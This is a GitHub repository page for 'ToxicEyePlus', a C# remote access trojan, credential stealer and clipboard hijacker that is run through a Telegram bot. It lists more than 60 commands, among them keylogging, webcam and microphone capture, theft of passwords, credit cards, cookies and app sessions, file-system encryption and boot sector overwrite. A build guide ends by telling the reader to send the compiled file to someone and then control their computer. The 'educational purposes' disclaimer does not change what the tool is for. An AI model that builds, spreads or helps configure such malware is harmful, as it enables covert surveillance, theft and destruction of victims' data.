Skip to content

Apache101/ToxicEyePlus

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

đź”± ToxicEyePlus (RAT + STEALER + CLIPPER)

Program for remote control of windows computers via telegram bot. Written in C#

Disclaimer

This program is not intended or permitted for malicious use. This project is Purely for educational purposes. Any damages is solely your responsibility. Do not run or use this RAT if you do not know what you are doing or getting into. No support will be provided for running the built program/injecting

🍂 Functions:

  • ComputerInfo,
  • BatteryInfo,
  • Location,
  • Whois,
  • ActiveWindow,
  • Webcam,
  • Microphone,
  • Desktop,
  • Keylogger,
  • ClipboardSet,
  • ClipboardGet,
  • ProcessList,
  • ProcessKill,
  • ProcessStart,
  • TaskManagerDisable,
  • TaskManagerEnable,
  • MinimizeAllWindows,
  • MaximizeAllWindows,
  • GetPasswords,
  • GetCreditCards,
  • GetHistory,
  • GetBookmarks,
  • GetCookies,
  • GetDesktop,
  • GetFileZilla,
  • GetDiscord,
  • GetTelegram,
  • GetSteam,
  • OpenCD,
  • CloseCD,
  • DownloadFile,
  • UploadFile,
  • RunFile,
  • RunFileAdmin,
  • ListFiles,
  • RemoveFile,
  • RemoveDir,
  • MoveFile,
  • MoveDir,
  • CopyFile,
  • CopyDir,
  • Speak,
  • Shell,
  • MessageBox,
  • OpenURL,
  • SendKeyPress,
  • NetDiscover,
  • AudioVolumeSet,
  • AudioVolumeGet,
  • SetWallPaper,
  • BlockInput,
  • Monitor(off/on),
  • DisplayRotate,
  • EncryptFileSystem,
  • DecryptFileSystem,
  • ForkBomb,
  • BsoD,
  • OverwriteBootSector,
  • Shutdown,
  • Reboot,
  • Hibernate,
  • Logoff,
  • Help,
  • About,
  • Uninstall.

Thats 60+ commands!

🔨 Compiling guide:

  • Go to the @BotFather bot and create your own bot. You need to save the token and bot name.
  • Now you need to get your chat id. To do this, go to the next bot @chatid_echo_bot and save the id.
  • Now you need to download Visual Studio 2019
  • Download the source code of this program.
  • Unzip the “Telegram RAT” folder to your desktop.
  • Open the TelegramRAT.sln file through Visual Studio.
  • Open file config.cs in project.
  • Insert your token from the bot and your chatID that you received earlier.
  • Above you need to select ”Release”.
  • Press CTRL + S to save. And CTRL + B to compile everything into an executable file.
  • You can send the received file to someone.
  • After starting the file, you can control the computer through the bot.
  • Write /help to see all available commands.

Credits:

  • This project was initially made by LimerBoy, it was then modified by me (MiskaWasTaken) to add verbosity and to make the RAT a bit more stealthier.

About

Program for remote control of windows computers via telegram bot. Written in C#

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C# 100.0%